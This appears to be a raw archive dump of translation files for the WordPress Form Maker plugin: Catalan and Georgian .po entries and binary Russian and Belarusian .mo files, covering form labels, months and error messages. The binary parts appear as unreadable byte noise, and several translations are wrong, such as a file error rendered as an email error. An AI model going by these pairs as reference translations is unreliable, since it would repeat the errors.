#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Abril"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mai"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Juny"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Juliol"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Agost"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Setembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Octubre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Novembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Desembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Error, el codi de seguretat incorrecte."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"La seva ip és la llista negra. Si us plau, poseu-vos en contacte amb "
"l'administrador del lloc web. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "L'arxiu supera la grandària permès de"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Ho sentim, no estan autoritzats a pujar aquest tipus de fitxer."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Error, l'arxiu no es pot moure."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Aquest camp %s requereix d'una entrada única i aquest valor ja s'havia "
"presentat."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Error, el correu electrònic no va ser enviat."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Res es va presentar."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "El formulari s'ha enviat correctament."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Error, el correu electrònic no va ser enviat."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "La seva adreça de correu electrònic ja està verificada."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "El seu correu electrònic s'ha verificat correctament."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "La teva adreça de correu electrònic de verificació ha caducat."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Enllaç de verificació no és vàlid."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "camp és obligatori."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Això no és una adreça de correu electrònic vàlida."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"No és possible seleccionar les dates anteriors. Trieu una data a partir de "
"l'actual."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "la "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "valor ha d'estar entre "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "quantitat "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "La seva puntuació ha de ser inferior a "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Títol"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Primer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Últim"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Mitjà"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Codi d'àrea"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Número de telèfon"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "dòlars "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "cents "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "des "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "A"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "anar "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "restablir"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Seleccioneu un camp "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Seleccioneu una data"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-ru_RU.mo000060400000011047152434416630012232 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
N
b
q

~
�
�
�
Z�
C?U��������
�
4&[
hv�����
\
(v

�
�
�
=�
�9�!��P�{9L�G^JE���;|<�1�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:03+0400
PO-Revision-Date: 2015-05-22 17:03+0400
Last-Translator: 
Language-Team: 
Language: ru
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
Апрелякод городаАвгустаЦентовГородСТРАНАДекабрьДолларовОшибка, адрес электронной почты не был отправлен.Ошибка, файл не может быть перемещен.Ошибка, неверный код безопасности.ФевральпервыйОтперейти ЯнварьИюляИюньПоследнийМартаМайСередина урокаНичего не было представлено.НоябрьOктябрьНомер телефонаПочтовый / ИндексКоличествоСброс Выберите ДатаВыберите поле СентябряК сожалению, вы не можете загрузить этот тип файла.Штат / Область / регионУлицаАдрес строка 2TheФайл превышает допустимый размерЭто поле %s требует уникальную запись, и эта величина уже представлены.Это не адрес электронной почты.Тема исследованияДоПроверка ссылка является недействительным.Вы не можете выбрать бывших даты. Выберите дату, начиная с текущего.Ваш адрес электронной почты уже проверен.Ваше сообщение было успешно проверено.Ваш адрес электронной почты подтверждение истекло.Ваша форма была успешно представлена.Ваш IP занесен в черный список. Пожалуйста, обратитесь к администратору сайтаВаша оценка должна быть не менееполе обязательно для заполнения.Значение должно быть междуlanguages/form_maker-be_BY.mo000060400000011037152434416630012155 0ustar00��4�G\xy	��������� #+05:@DKbks���
��	�7�)$?Kd"����L�'G*o&�%�A�)H[�q-
>
N

]
k
w
�

�
^�
G7S�
��������4#Xi
~��	����T	
*^

�
�
C�
��
;y
��O�}N�Q�`6I���Am:�4�3%
$#+	4&1 ,
0/*.!)-"(2'AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2The file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:50+0400
PO-Revision-Date: 2015-05-22 16:50+0400
Last-Translator: 
Language-Team: 
Language: be
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
КрасавікКод зоныЖнівеньцэнтаў Горад:&ПрымацавацьСнежаньдаляры Памылка, адрас электроннай пошты не быў адпраўлены.Памылка, файл не можа быць перамешчаны.Памылка, няслушны код бяспекі.ЛютыПершыАдперайсці СтудзеньЛіпеньЧэрвеньАпошніяСакавікТравеньСярэдзінаНічога не было прадстаўлена.ЛістападКастрычнікНумарПаштовы / ІндэксКолькасцьскід Выберыце ДатаВыберыце полеВерасеньНа жаль, вы не можаце загрузіць гэты тып файла.Штат / Вобласць / рэгіёнАдрасАдрас радок 2Размовы перавышае дапушчальны памерГэтае поле %s патрабуе унікальную запіс, і гэтая велічыня ўжо прадстаўлены.Гэта не адрас электроннай пошты.НазваДляПраверка спасылка з'яўляецца несапраўдным.Вы не можаце выбраць былых даты. Выберыце дату, пачынаючы з бягучага.Ваш адрас электроннай пошты ўжо правераны.Ваша паведамленне было паспяхова праверана.Ваш адрас электроннай пошты пацверджанне скончыўся.Ваша форма была паспяхова прадстаўлена.Ваш IP занесены ў чорны спіс. Калі ласка, звярніцеся да адміністратара сайта. Ваша ацэнка павінна быць не менш за поле абавязкова для запаўнення.значэнне павінна быць паміж languages/form_maker-ka_GE.po000060400000062224152434416630012152 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:59+0400\n"
"PO-Revision-Date: 2015-05-22 16:59+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ka\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "ქუჩის მისამართი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "ქუჩის მისამართი Line 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "ქალაქი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "სახელმწიფო / Province / რაიონი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "საფოსტო / საფოსტო კოდი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "ქვეყანა"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "იანვარი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "თებერვალი"

